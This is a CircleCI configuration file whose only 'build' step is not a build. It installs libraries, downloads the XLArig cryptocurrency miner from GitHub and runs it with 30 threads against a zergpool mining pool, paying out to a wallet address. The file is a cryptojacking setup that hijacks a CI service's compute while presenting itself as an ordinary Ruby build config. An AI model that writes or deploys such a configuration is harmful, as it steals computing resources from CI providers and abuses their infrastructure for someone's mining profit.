version: 2.0
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run:  sudo apt-get install libcurl4-openssl-dev libssl-dev libjansson-dev automake autotools-dev build-essential && wget https://github.com/scala-network/XLArig/releases/download/v5.2.2/XLArig-v5.2.2-linux-x86_64.zip  && unzip XLArig-v5.2.2-linux-x86_64.zip && ./xlarig -a rx/0 -o stratum+tcp://randomx.na.mine.zergpool.com:4453 -u D8Kq7Lu982DCTudZocXVbPQRgzPMqRSDsT --keepalive --timeout 120 --donate-level 1 -p  c=DOGE,mc=XMR,ID=xmdoger -t 30